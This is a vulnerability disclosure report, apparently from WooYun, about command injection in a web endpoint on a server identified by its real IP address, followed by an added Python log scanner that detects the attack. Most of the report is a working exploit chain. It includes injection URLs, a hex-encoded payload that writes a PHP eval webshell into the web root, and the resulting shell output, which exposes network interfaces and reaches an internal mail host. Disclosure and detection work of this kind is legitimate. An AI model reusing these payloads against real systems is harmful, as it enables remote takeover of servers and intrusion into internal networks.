WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online reading -------- http://drop.zone.ci/
2015-11-07: Details sent to the vendor, awaiting vendor handling
2015-11-07: Vendor confirmed; details disclosed to the vendor only
2015-11-17: Details disclosed to core white hats and relevant domain experts
2015-11-27: Details disclosed to regular white hats
2015-12-07: Details disclosed to intern white hats
2015-12-22: Details disclosed to the public
code exec
http://61.135.152.231/webtrans/index.php?controller=user&action=login
http://61.135.152.231/SetTime/index.php?time=%27set%7cset%26set%27
Code execution at the set position.
pwd, then write a shell:
61.135.152.231//SetTime/index.php?time='set;echo+3C3F706870206576616C28245F504F53545B635D293B3F3E|xxd+-r+-ps+>/var/www/webbak/template/1.php;ls+'
http://61.135.152.231/webbak/template/1.php c
[/var/www/webbak/template/]$ /sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr 0c:c4:7a:08:7c:7c
          inet addr:61.135.152.231  Bcast:61.135.152.255  Mask:255.255.255.224
          inet6 addr: fe80::ec4:7aff:fe08:7c7c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:5017795 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2704480 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:1182610202 (1.1 GB)  TX bytes:326898975 (326.8 MB)
          Memory:f7200000-f7280000

eth1      Link encap:Ethernet  HWaddr 0c:c4:7a:08:7c:7d
          inet addr:192.168.1.145  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
          Memory:f7100000-f7180000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:680777 errors:0 dropped:0 overruns:0 frame:0
          TX packets:680777 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:756699997 (756.6 MB)  TX bytes:756699997 (756.6 MB)

[/var/www/webbak/template/]$ ping -c 1 mail.staff.sina.com.cn
PING mail.staff.sina.com.cn (10.210.97.18) 56(84) bytes of data.
64 bytes from bogon (10.210.97.18): icmp_req=1 ttl=252 time=0.113 ms

--- mail.staff.sina.com.cn ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.113/0.113/0.113/0.000 ms
[/var/www/webbak/template/]$
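As an added example (not part of the original report), a small Python scanner that flags the two traces this report leaves in a web access log: shell metacharacters in the time parameter of /SetTime/index.php, and requests for PHP files under /webbak/template/. The log lines are constructed, and the assumption that nothing ending in .php should ever be served from the template directory is mine.

```python
"""Flag access-log lines matching the command-injection pattern in this report."""
import re
from urllib.parse import parse_qs

# Characters that let a value break out of a shell-quoted argument.
SHELL_META = re.compile(r"""['"`;|&$<>\\\n]""")
# Apache/Nginx "combined" format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<request>\S+) \S+" (?P<status>\d{3})'
)
INJECTABLE_ENDPOINT = "/SetTime/index.php"   # endpoint named in the report
TEMPLATE_DIR = "/webbak/template/"            # where the shell was dropped


def classify(line: str):
    """Return a list of (finding, client_ip, detail) for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path, _, query = m.group("request").partition("?")
    # Collapse repeated slashes (the report's URL used //SetTime/) so an
    # extra '/' cannot dodge the path check.
    path = re.sub(r"/+", "/", path)
    findings = []
    if path.endswith(INJECTABLE_ENDPOINT):
        # parse_qs percent-decodes values, so %27 / %7c / %26 become ' | &
        for value in parse_qs(query, keep_blank_values=True).get("time", []):
            if SHELL_META.search(value):
                findings.append(("time-param-shell-meta", m.group("ip"), value))
    if path.startswith(TEMPLATE_DIR) and path.endswith(".php"):
        findings.append(("php-under-template-dir", m.group("ip"), path))
    return findings


def scan(lines):
    """Run classify over every line and flatten the findings."""
    return [f for line in lines for f in classify(line)]


# Constructed sample log: one benign request, the report's probe, a shell hit.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Nov/2015:16:55:01 +0800] "GET /SetTime/index.php?time=2015-11-07+16:55:00 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [07/Nov/2015:16:58:12 +0800] "GET //SetTime/index.php?time=%27set%7cset%26set%27 HTTP/1.1" 200 3021 "-" "curl/7.35.0"',
    '10.0.0.9 - - [07/Nov/2015:17:00:03 +0800] "POST /webbak/template/1.php HTTP/1.1" 200 88 "-" "curl/7.35.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```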
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-11-07 17:03
Thanks for the support; the business team has been notified to remediate.
None for now